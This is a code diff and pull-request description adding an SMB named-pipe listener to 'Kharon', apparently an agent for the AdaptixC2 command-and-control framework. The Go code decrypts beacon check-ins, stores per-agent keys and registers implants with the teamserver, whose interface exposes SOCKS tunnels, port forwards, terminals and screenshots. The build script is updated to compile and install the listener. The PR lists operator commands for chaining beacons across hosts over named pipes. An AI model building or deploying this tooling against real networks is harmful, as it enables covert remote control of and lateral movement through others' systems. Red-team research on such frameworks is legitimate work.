+	TsDownloadGetFilepath(fileId string) (string, error)
+	TsUploadGetFilepath(fileId string) (string, error)
+	TsUploadGetFileContent(fileId string) ([]byte, error)
+
+	TsListenerInteralHandler(watermark string, data []byte) (string, error)
+
+	TsGetPivotInfoByName(pivotName string) (string, string, string)
+	TsGetPivotInfoById(pivotId string) (string, string, string)
+	TsGetPivotByName(pivotName string) *ax.PivotData
+	TsGetPivotById(pivotId string) *ax.PivotData
+	TsPivotCreate(pivotId string, pAgentId string, chAgentId string, pivotName string, isRestore bool) error
+	TsPivotDelete(pivotId string) error
+
+	TsScreenshotAdd(agentId string, Note string, Content []byte) error
+	TsScreenshotNote(screenId string, note string) error
+	TsScreenshotDelete(screenId string) error
+
+	TsTargetsAdd(targets []map[string]interface{}) error
+	TsTargetsCreateAlive(agentData ax.AgentData) (string, error)
+	TsTargetsEdit(targetId string, computer string, domain string, address string, os int, osDesk string, tag string, info string, alive bool) error
+	TsTargetSetTag(targetsId []string, tag string) error
+	TsTargetRemoveSessions(agentsId []string) error
+	TsTargetDelete(targetsId []string) error
+
+	TsTunnelStart(TunnelId string) (string, error)
+	TsTunnelCreateSocks4(AgentId string, Info string, Lhost string, Lport int) (string, error)
+	TsTunnelCreateSocks5(AgentId string, Info string, Lhost string, Lport int, UseAuth bool, Username string, Password string) (string, error)
+	TsTunnelCreateLportfwd(AgentId string, Info string, Lhost string, Lport int, Thost string, Tport int) (string, error)
+	TsTunnelCreateRportfwd(AgentId string, Info string, Lport int, Thost string, Tport int) (string, error)
+	TsTunnelUpdateRportfwd(tunnelId int, result bool) (string, string, error)
+
+	TsTunnelStopSocks(AgentId string, Port int)
+	TsTunnelStopLportfwd(AgentId string, Port int)
+	TsTunnelStopRportfwd(AgentId string, Port int)
+
+	TsTunnelConnectionClose(channelId int, writeOnly bool)
+	TsTunnelConnectionHalt(channelId int, errorCode byte)
+	TsTunnelConnectionResume(AgentId string, channelId int, ioDirect bool)
+	TsTunnelConnectionData(channelId int, data []byte)
+	TsTunnelConnectionAccept(tunnelId int, channelId int)
+
+	TsTerminalConnExists(terminalId string) bool
+	TsTerminalGetPipe(AgentId string, terminalId string) (*io.PipeReader, *io.PipeWriter, error)
+	TsTerminalConnResume(agentId string, terminalId string, ioDirect bool)
+	TsTerminalConnData(terminalId string, data []byte)
+	TsTerminalConnClose(terminalId string, status string) error
+
+	TsExtenderDataLoad(extenderName string, key string) ([]byte, error)
+	TsExtenderDataSave(extenderName string, key string, value []byte) error
+	TsExtenderDataDelete(extenderName string, key string) error
+	TsExtenderDataKeys(extenderName string) ([]string, error)
+	TsExtenderDataDeleteAll(extenderName string) error
+
+	TsConvertCpToUTF8(input string, codePage int) string
+	TsConvertUTF8toCp(input string, codePage int) string
+	TsWin32Error(errorCode uint) string
+}
+
+type PluginListener struct{}
+
+type ModuleExtender struct {
+	ts Teamserver
+	pl *PluginListener
+}
+
+var (
+	ModuleObject    *ModuleExtender
+	ModuleDir       string
+	ListenerDataDir string
+	ListenersObject []any
+)
+
+const AgentWatermark = "c17a905a"
+
+// ==================== Plugin Initialization ====================
+
+func InitPlugin(ts any, moduleDir string, listenerDir string) ax.PluginListener {
+	ModuleDir = moduleDir
+	ListenerDataDir = listenerDir
+
+	ModuleObject = &ModuleExtender{
+		ts: ts.(Teamserver),
+		pl: &PluginListener{},
+	}
+	return &PluginListener{}
+}
+
+// ==================== Listener Lifecycle ====================
+
+func (pl *PluginListener) Create(name string, data string, listenerCustomData []byte) (ax.ExtenderListener, ax.ListenerData, []byte, error) {
+	var (
+		listenerData ax.ListenerData
+		customData   []byte
+		conf         TransportConfig
+		err          error
+	)
+
+	if listenerCustomData == nil {
+		err = json.Unmarshal([]byte(data), &conf)
+		if err != nil {
+			return nil, listenerData, customData, err
+		}
+
+		err = validConfig(data)
+		if err != nil {
+			return nil, listenerData, customData, err
+		}
+
+		conf.Protocol = "bind_smb"
+	} else {
+		err = json.Unmarshal(listenerCustomData, &conf)
+		if err != nil {
+			return nil, listenerData, customData, err
+		}
+	}
+
+	transport := &TransportSMB{
+		Name:   name,
+		Config: conf,
+		Active: true,
+	}
+
+	listenerData = ax.ListenerData{
+		AgentAddr: fmt.Sprintf("\\\\.\\pipe\\%s", conf.Pipename),
+		Watermark: "c17a905a", // Kharon agent watermark — must match for TsListenerInteralHandler routing
+		Status:    "Active",
+	}
+
+	var buffer bytes.Buffer
+	err = json.NewEncoder(&buffer).Encode(conf)
+	if err != nil {
+		return nil, listenerData, customData, err
+	}
+	customData = buffer.Bytes()
+
+	listener := &Listener{
+		transport: transport,
+	}
+
+	ListenersObject = append(ListenersObject, transport)
+
+	return listener, listenerData, customData, nil
+}
+
+// Start is a no-op for internal listeners (no port binding)
+func (l *Listener) Start() error {
+	return nil
+}
+
+func (l *Listener) Edit(config string) (ax.ListenerData, []byte, error) {
+	for _, value := range ListenersObject {
+		transport := value.(*TransportSMB)
+		if transport.Name == l.transport.Name {
+			listenerData := ax.ListenerData{
+				AgentAddr: fmt.Sprintf("\\\\.\\pipe\\%s", transport.Config.Pipename),
+				Status:    "Active",
+			}
+			if !transport.Active {
+				listenerData.Status = "Stopped"
+			}
+
+			var buffer bytes.Buffer
+			err := json.NewEncoder(&buffer).Encode(transport.Config)
+			if err != nil {
+				return listenerData, nil, err
+			}
+
+			return listenerData, buffer.Bytes(), nil
+		}
+	}
+	return ax.ListenerData{}, nil, errors.New("listener not found")
+}
+
+func (l *Listener) Stop() error {
+	var (
+		index int
+		ok    bool
+	)
+
+	for ind, value := range ListenersObject {
+		transport := value.(*TransportSMB)
+		if transport.Name == l.transport.Name {
+			transport.Active = false
+			index = ind
+			ok = true
+			break
+		}
+	}
+
+	if ok {
+		ListenersObject = append(ListenersObject[:index], ListenersObject[index+1:]...)
+	} else {
+		return errors.New("listener not found")
+	}
+
+	return nil
+}
+
+func (l *Listener) GetProfile() ([]byte, error) {
+	var buffer bytes.Buffer
+	err := json.NewEncoder(&buffer).Encode(l.transport.Config)
+	if err != nil {
+		return nil, err
+	}
+	return buffer.Bytes(), nil
+}
+
+// ==================== InternalHandler ====================
+// Called by the teamserver when a parent beacon forwards pivot data
+// from a child SMB beacon. The data parameter contains the raw
+// encrypted checkin blob from the child.
+
+func (l *Listener) InternalHandler(data []byte) (string, error) {
+	if len(data) < 52 {
+		return "", fmt.Errorf("insufficient data length: got %d bytes, need at least 52 (36 UUID + 16 key)", len(data))
+	}
+
+	totalLen := len(data)
+
+	// processDecryptedData handles format detection and routing to TsAgentProcessData.
+	// decryptedData = Decrypt(data[36:]) — starts AFTER UUID.
+	// PostTask (0x01): strip type byte, pass [jobCount][jobs] to ProcessData
+	// QuickMsg (0x05) / QuickOut (0x07): wrap with 7-byte header like HTTP listener
+	processDecryptedData := func(agentID string, decryptedData []byte) {
+		if len(decryptedData) <= 1 {
+			return
+		}
+		firstByte := decryptedData[0]
+		var taskData []byte
+		if firstByte == 0x05 || firstByte == 0x07 {
+			msgTypePattern := append([]byte{0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0}, decryptedData...)
+			taskData = msgTypePattern
+		} else if firstByte == 0x01 {
+			taskData = decryptedData[1:]
+		} else {
+			taskData = decryptedData
+		}
+		_ = ModuleObject.ts.TsAgentProcessData(agentID, taskData)
+	}
+
+	// Try to match against known agents by UUID in first 8 bytes
+	if totalLen >= 36 {
+		testAgentID := string(data[:8])
+
+		if ModuleObject.ts.TsAgentIsExists(testAgentID) {
+			storedKey, err := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, "key_"+testAgentID)
+			if err == nil && len(storedKey) == 16 {
+				encryptedData := data[36:]
+				crypt := NewLokyCrypt(storedKey, storedKey)
+				decryptedData := crypt.Decrypt(encryptedData)
+
+				_ = ModuleObject.ts.TsAgentSetTick(testAgentID, l.transport.Name)
+				processDecryptedData(testAgentID, decryptedData)
+
+				return testAgentID, nil
+			}
+		}
+
+		// Try all stored keys to find a match (handles renamed agent IDs)
+		keys, keyErr := ModuleObject.ts.TsExtenderDataKeys(l.transport.Name)
+		if keyErr == nil {
+			for _, k := range keys {
+				if len(k) > 4 && k[:4] == "key_" {
+					agentID := k[4:]
+					storedKey, _ := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, k)
+					if len(storedKey) == 16 && ModuleObject.ts.TsAgentIsExists(agentID) {
+						encryptedData := data[36:]
+						crypt := NewLokyCrypt(storedKey, storedKey)
+						decryptedData := crypt.Decrypt(encryptedData)
+
+						_ = ModuleObject.ts.TsAgentSetTick(agentID, l.transport.Name)
+						processDecryptedData(agentID, decryptedData)
+
+						return agentID, nil
+					}
+				}
+			}
+		}
+	}
+
+	// New agent: extract key from last 16 bytes
+	// Format: [0:36] UUID (plaintext) | [36:len-16] encrypted beat | [len-16:] 16-byte key
+	extractedKey := make([]byte, 16)
+	copy(extractedKey, data[totalLen-16:])
+
+	oldAgentId := data[:36]
+	encryptedBeat := data[36 : totalLen-16]
+
+	agentIdFull := string(oldAgentId)
+	agentId := agentIdFull[:8]
+
+	// Decrypt the beat data using the extracted key
+	crypt := NewLokyCrypt(extractedKey, extractedKey)
+	decryptedBeat := crypt.Decrypt(encryptedBeat)
+
+	// Clear old stored keys (prevent stale key matching across sessions)
+	oldKeys, _ := ModuleObject.ts.TsExtenderDataKeys(l.transport.Name)
+	for _, k := range oldKeys {
+		if len(k) > 4 && k[:4] == "key_" {
+			ModuleObject.ts.TsExtenderDataDelete(l.transport.Name, k)
+		}
+	}
+
+	// Store the agent's encryption key for future communications
+	err := ModuleObject.ts.TsExtenderDataSave(l.transport.Name, "key_"+agentId, extractedKey)
+	if err != nil {
+		return "", fmt.Errorf("failed to save agent key: %v", err)
+	}
+
+	// Register the agent with the teamserver (Async=false — SMB is synchronous)
+	agentDataRes, err := ModuleObject.ts.TsAgentCreate(AgentWatermark, agentId, decryptedBeat, l.transport.Name, "", false)
+	if err != nil {
+		return "", fmt.Errorf("failed to create agent: %v", err)
+	}
+
+	newAgentID := agentDataRes.Id
+
+	// If the teamserver assigned a different ID, save the key under the new ID too
+	if newAgentID != agentId {
+		_ = ModuleObject.ts.TsExtenderDataSave(l.transport.Name, "key_"+newAgentID, extractedKey)
+	}
+
+	return newAgentID, nil
+}

--- a/listener_kharon_smb/src_server/pl_main.go
+++ b/listener_kharon_smb/src_server/pl_main.go
@@ -278,11 +278,9 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 	// QuickMsg (0x05) / QuickOut (0x07): wrap with 7-byte header like HTTP listener
 	processDecryptedData := func(agentID string, decryptedData []byte) {
 		if len(decryptedData) <= 1 {
-			fmt.Printf("[IH-DBG] processDecryptedData: too short (%d) for agent %s\n", len(decryptedData), agentID)
 			return
 		}
 		firstByte := decryptedData[0]
-		fmt.Printf("[IH-DBG] processDecryptedData: agent=%s, len=%d, firstByte=0x%02x\n", agentID, len(decryptedData), firstByte)
 		var taskData []byte
 		if firstByte == 0x05 || firstByte == 0x07 {
 			msgTypePattern := append([]byte{0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0}, decryptedData...)
@@ -290,21 +288,14 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 		} else if firstByte == 0x01 {
 			taskData = decryptedData[1:]
 		} else {
-			fmt.Printf("[IH-DBG] processDecryptedData: UNKNOWN format 0x%02x, passing raw\n", firstByte)
 			taskData = decryptedData
 		}
-		err := ModuleObject.ts.TsAgentProcessData(agentID, taskData)
-		if err != nil {
-			fmt.Printf("[IH-DBG] TsAgentProcessData ERROR: %v\n", err)
-		}
+		_ = ModuleObject.ts.TsAgentProcessData(agentID, taskData)
 	}
 
 	// Try to match against known agents by UUID in first 8 bytes
 	if totalLen >= 36 {
 		testAgentID := string(data[:8])
-		fmt.Printf("[IH-DBG] InternalHandler: len=%d, testAgentID='%s', exists=%v\n",
-			totalLen, testAgentID, ModuleObject.ts.TsAgentIsExists(testAgentID))
-
 		if ModuleObject.ts.TsAgentIsExists(testAgentID) {
 			storedKey, err := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, "key_"+testAgentID)
 			if err == nil && len(storedKey) == 16 {
@@ -347,7 +338,6 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 				}
 			}
 
-			fmt.Printf("[IH-DBG] direct key match: origUUID='%s' → agent=%s\n", origPrefix, agentID)
 			_ = ModuleObject.ts.TsAgentSetTick(agentID, l.transport.Name)
 			processDecryptedData(agentID, decryptedData)
 

--- a/listener_kharon_smb/src_server/pl_transport.go
+++ b/listener_kharon_smb/src_server/pl_transport.go
@@ -1,0 +1,51 @@
+package main
+
+import (
+	"encoding/json"
+	"errors"
+	"regexp"
+)
+
+type Listener struct {
+	transport *TransportSMB
+}
+
+type TransportSMB struct {
+	Config TransportConfig
+	Name   string
+	Active bool
+}
+
+type TransportConfig struct {
+	Pipename   string `json:"pipename"`
+	EncryptKey string `json:"encrypt_key"`
+	Protocol   string `json:"protocol"`
+}
+
+func validConfig(config string) error {
+	var conf TransportConfig
+	err := json.Unmarshal([]byte(config), &conf)
+	if err != nil {
+		return err
+	}
+
+	if conf.Pipename == "" {
+		return errors.New("pipename is required")
+	}
+
+	matched, err := regexp.MatchString(`^[a-zA-Z0-9\-_.]+$`, conf.Pipename)
+	if err != nil || !matched {
+		return errors.New("pipename invalid: must contain only alphanumeric, dash, underscore, or dot characters")
+	}
+
+	if len(conf.Pipename) > 256 {
+		return errors.New("pipename too long: max 256 characters")
+	}
+
+	match, _ := regexp.MatchString("^[0-9a-fA-F]{32}$", conf.EncryptKey)
+	if len(conf.EncryptKey) != 32 || !match {
+		return errors.New("encrypt_key must be exactly 32 hex characters")
+	}
+
+	return nil
+}

--- a/setup_kharon.sh
+++ b/setup_kharon.sh
@@ -309,7 +309,6 @@ case $ACTION in
         build_agent_beacon
         build_listener
         build_listener_smb
-        build_server
         copy_agent_dist
         copy_listener_dist
         copy_listener_smb_dist

--- a/setup_kharon.sh
+++ b/setup_kharon.sh
@@ -196,6 +196,12 @@ function setup_go_workspace_listener_smb {
     info_msg "Go workspace configured for SMB listener"
 }
 
+function build_server {
+    cd "$ADAPTIX_DIR/AdaptixServer" || error_exit "Could not enter AdaptixServer directory"
+    go build -o ../dist/adaptixserver . || error_exit "Failed to rebuild Adaptix server"
+    info_msg "Rebuilt Adaptix server (ensures plugin compatibility)"
+}
+
 function build_agent_code {
     cd "$ADAPTIX_DIR/AdaptixServer" || error_exit "Could not enter AdaptixServer directory"
     
@@ -303,6 +309,7 @@ case $ACTION in
         build_agent_beacon
         build_listener
         build_listener_smb
+        build_server
         copy_agent_dist
         copy_listener_dist
         copy_listener_smb_dist

--- a/setup_kharon.sh
+++ b/setup_kharon.sh
@@ -24,6 +24,7 @@ PULL_CHANGES=false
 ADAPTIX_DIR=""
 AGENT="agent_kharon"
 LISTENER="listener_kharon_http"
+LISTENER_SMB="listener_kharon_smb"
 ACTION="all"
 
 # Parse arguments
@@ -63,7 +64,8 @@ if [ -z "$ADAPTIX_DIR" ]; then
     echo "  agent-full          Build agent server, modules and beacon"
     echo "  agent-modules       Build and copy agent modules only"
     echo "  agent-code          Build and copy agent code only"
-    echo "  listener            Build and copy listener only"
+    echo "  listener            Build and copy HTTP listener only"
+    echo "  listener-smb        Build and copy SMB listener only"
     echo ""
     echo "Examples:"
     echo "  $0 --ax AdaptixC2"
@@ -96,6 +98,10 @@ if [ ! -d "$LISTENER" ]; then
     error_exit "Listener folder ($LISTENER) not found in current directory"
 fi
 
+if [ ! -d "$LISTENER_SMB" ]; then
+    warning_msg "SMB Listener folder ($LISTENER_SMB) not found — SMB listener will be skipped"
+fi
+
 # Create necessary directories
 mkdir -p "$ADAPTIX_DIR/AdaptixServer/extenders" || error_exit "Failed to create extenders directory"
 mkdir -p "$ADAPTIX_DIR/dist/extenders" || error_exit "Failed to create dist/extenders directory"
@@ -110,7 +116,13 @@ function clean_agent {
 function clean_listener {
     rm -rf "$ADAPTIX_DIR/AdaptixServer/extenders/$LISTENER"
     rm -rf "$ADAPTIX_DIR/dist/extenders/$LISTENER"
-    info_msg "Cleaned previous listener installation"
+    info_msg "Cleaned previous HTTP listener installation"
+}
+
+function clean_listener_smb {
+    rm -rf "$ADAPTIX_DIR/AdaptixServer/extenders/$LISTENER_SMB"
+    rm -rf "$ADAPTIX_DIR/dist/extenders/$LISTENER_SMB"
+    info_msg "Cleaned previous SMB listener installation"
 }
 
 function copy_agent {
@@ -119,21 +131,34 @@ function copy_agent {
 }
 
 function copy_listener {
-    cp -r "$LISTENER" "$ADAPTIX_DIR/AdaptixServer/extenders/" || error_exit "Failed to copy listener"
-    info_msg "Copied listener files to AdaptixServer"
+    cp -r "$LISTENER" "$ADAPTIX_DIR/AdaptixServer/extenders/" || error_exit "Failed to copy HTTP listener"
+    info_msg "Copied HTTP listener files to AdaptixServer"
+}
+
+function copy_listener_smb {
+    if [ -d "$LISTENER_SMB" ]; then
+        cp -r "$LISTENER_SMB" "$ADAPTIX_DIR/AdaptixServer/extenders/" || error_exit "Failed to copy SMB listener"
+        info_msg "Copied SMB listener files to AdaptixServer"
+    else
+        warning_msg "SMB listener directory not found, skipping copy"
+    fi
 }
 
 function setup_go_workspace {
     cd "$ADAPTIX_DIR/AdaptixServer" || error_exit "Could not enter $ADAPTIX_DIR/AdaptixServer"
-    
+
     if [ -d "extenders/$AGENT" ]; then
         go work use "extenders/$AGENT" || error_exit "Failed to add agent to Go workspace"
     fi
-    
+
     if [ -d "extenders/$LISTENER" ]; then
-        go work use "extenders/$LISTENER" || error_exit "Failed to add listener to Go workspace"
+        go work use "extenders/$LISTENER" || error_exit "Failed to add HTTP listener to Go workspace"
     fi
-    
+
+    if [ -d "extenders/$LISTENER_SMB" ]; then
+        go work use "extenders/$LISTENER_SMB" || error_exit "Failed to add SMB listener to Go workspace"
+    fi
+
     go work sync || error_exit "Failed to synchronize Go workspace"
     info_msg "Go workspace configured"
 }
@@ -151,13 +176,24 @@ function setup_go_workspace_agent {
 
 function setup_go_workspace_listener {
     cd "$ADAPTIX_DIR/AdaptixServer" || error_exit "Could not enter $ADAPTIX_DIR/AdaptixServer"
-    
+
     if [ -d "extenders/$LISTENER" ]; then
         go work use "extenders/$LISTENER" || error_exit "Failed to add listener to Go workspace"
     fi
-    
+
     go work sync || error_exit "Failed to synchronize Go workspace"
-    info_msg "Go workspace configured for listener"
+    info_msg "Go workspace configured for HTTP listener"
+}
+
+function setup_go_workspace_listener_smb {
+    cd "$ADAPTIX_DIR/AdaptixServer" || error_exit "Could not enter $ADAPTIX_DIR/AdaptixServer"
+
+    if [ -d "extenders/$LISTENER_SMB" ]; then
+        go work use "extenders/$LISTENER_SMB" || error_exit "Failed to add SMB listener to Go workspace"
+    fi
+
+    go work sync || error_exit "Failed to synchronize Go workspace"
+    info_msg "Go workspace configured for SMB listener"
 }
 
 function build_agent_code {
@@ -195,13 +231,24 @@ function build_agent_beacon {
 
 function build_listener {
     cd "$ADAPTIX_DIR/AdaptixServer" || error_exit "Could not enter AdaptixServer directory"
-    
+
     if [ ! -f "extenders/$LISTENER/Makefile" ]; then
         error_exit "Makefile not found for $LISTENER"
     fi
-    
-    make -C "extenders/$LISTENER" all || error_exit "Failed to build listener"
-    info_msg "Built listener"
+
+    make -C "extenders/$LISTENER" all || error_exit "Failed to build HTTP listener"
+    info_msg "Built HTTP listener"
+}
+
+function build_listener_smb {
+    cd "$ADAPTIX_DIR/AdaptixServer" || error_exit "Could not enter AdaptixServer directory"
+
+    if [ -d "extenders/$LISTENER_SMB" ] && [ -f "extenders/$LISTENER_SMB/Makefile" ]; then
+        make -C "extenders/$LISTENER_SMB" all || error_exit "Failed to build SMB listener"
+        info_msg "Built SMB listener"
+    else
+        warning_msg "SMB listener not found, skipping build"
+    fi
 }
 
 function copy_agent_dist {
@@ -224,12 +271,20 @@ function copy_agent_dist {
 
 function copy_listener_dist {
     mkdir -p "$ADAPTIX_DIR/dist/extenders/$LISTENER" || error_exit "Failed to create listener dist directory"
-    
+
     if [ -d "$ADAPTIX_DIR/AdaptixServer/extenders/$LISTENER/dist" ]; then
         cp -r "$ADAPTIX_DIR/AdaptixServer/extenders/$LISTENER/dist"/* "$ADAPTIX_DIR/dist/extenders/$LISTENER/" || error_exit "Failed to copy listener dist files"
     fi
-    
-    info_msg "Copied listener distribution files to dist"
+
+    info_msg "Copied HTTP listener distribution files to dist"
+}
+
+function copy_listener_smb_dist {
+    if [ -d "$ADAPTIX_DIR/AdaptixServer/extenders/$LISTENER_SMB/dist" ]; then
+        mkdir -p "$ADAPTIX_DIR/dist/extenders/$LISTENER_SMB" || error_exit "Failed to create SMB listener dist directory"
+        cp -r "$ADAPTIX_DIR/AdaptixServer/extenders/$LISTENER_SMB/dist"/* "$ADAPTIX_DIR/dist/extenders/$LISTENER_SMB/" || error_exit "Failed to copy SMB listener dist files"
+        info_msg "Copied SMB listener distribution files to dist"
+    fi
 }
 
 # Execute actions based on ACTION parameter
@@ -238,15 +293,19 @@ case $ACTION in
         info_msg "Action: Full installation (all)"
         clean_agent
         clean_listener
+        clean_listener_smb
         copy_agent
         copy_listener
+        copy_listener_smb
         setup_go_workspace
         build_agent_code
         build_agent_core
         build_agent_beacon
         build_listener
+        build_listener_smb
         copy_agent_dist
         copy_listener_dist
+        copy_listener_smb_dist
         ;;
     
     agent-full)
@@ -279,14 +338,23 @@ case $ACTION in
         ;;
     
     listener)
-        info_msg "Action: Listener only"
+        info_msg "Action: HTTP Listener only"
         clean_listener
         copy_listener
         setup_go_workspace_listener
         build_listener
         copy_listener_dist
         ;;
-    
+
+    listener-smb)
+        info_msg "Action: SMB Listener only"
+        clean_listener_smb
+        copy_listener_smb
+        setup_go_workspace_listener_smb
+        build_listener_smb
+        copy_listener_smb_dist
+        ;;
+
     *)
         error_exit "Unknown action: $ACTION"
         ;;
@@ -297,6 +365,7 @@ info_msg "Installation completed successfully"
 echo "================================================================"
 echo "Action: $ACTION"
 echo "Agent: $AGENT"
-echo "Listener: $LISTENER"
+echo "Listener HTTP: $LISTENER"
+echo "Listener SMB: $LISTENER_SMB"
 echo "Location: $ADAPTIX_DIR"
 echo "================================================================"


### PR DESCRIPTION
## Add SMB Named-Pipe Listener with P2P Beacon Chaining

### Summary
- New `listener_kharon_smb/` plugin - internal SMB listener for pivot operations over Windows named pipes
- P2P beacon chaining: `link`/`unlink` commands available on SMB beacons enabling `HTTP → SMB → SMB → SMB` relay chains
- New `list_pipe` BOF command to enumerate named pipes on target with wildcard filtering
- SMB beacon runtime identity - unique UUID and pipe name per instance for multi-execution support
- Updated build system, setup script, and documentation for SMB listener integration

### New Files
```
listener_kharon_smb/
├── ax_config.axs
├── config.yaml
├── Makefile
├── go.mod / go.sum
└── src_server/
    ├── pl_main.go          # InternalHandler + agent lifecycle
    ├── pl_transport.go     # Transport config + validation
    └── pl_lokycrypt.go     # LokyCrypt cipher for pipe encryption

agent_kharon/src_core/general/list_pipe.cc   # Pipe enumeration BOF
```

### Usage
```
# From HTTP or SMB beacon:
list_pipe kharon                              # discover pipe names on target
link smb 10.10.10.5 kharon_c2_a3f1            # link to SMB child
unlink <agent_id>                             # disconnect child

# P2P chain example:
HTTP(A) → link SMB(B) → from B: link SMB(C)  # three-hop relay
```

### Modified Files
- `agent_kharon/src_beacon/` - SMB transport (`Smb.cc`), PostJobs output buffering (`Package.cc`), pivot Exchange relay (`Tasks.cc`), runtime UUID/pipe name generation (`Config.cc`)
- `agent_kharon/src_server/` - Pivot task routing, Exchange response processing, `list_pipe` command handler
- `agent_kharon/dist/ax_config.axs` - SMB command group with `link`, `unlink`, `list_pipe`
- `setup_kharon.sh` - SMB listener build, copy, and workspace integration
- `doc/` - Updated setup instructions and command reference
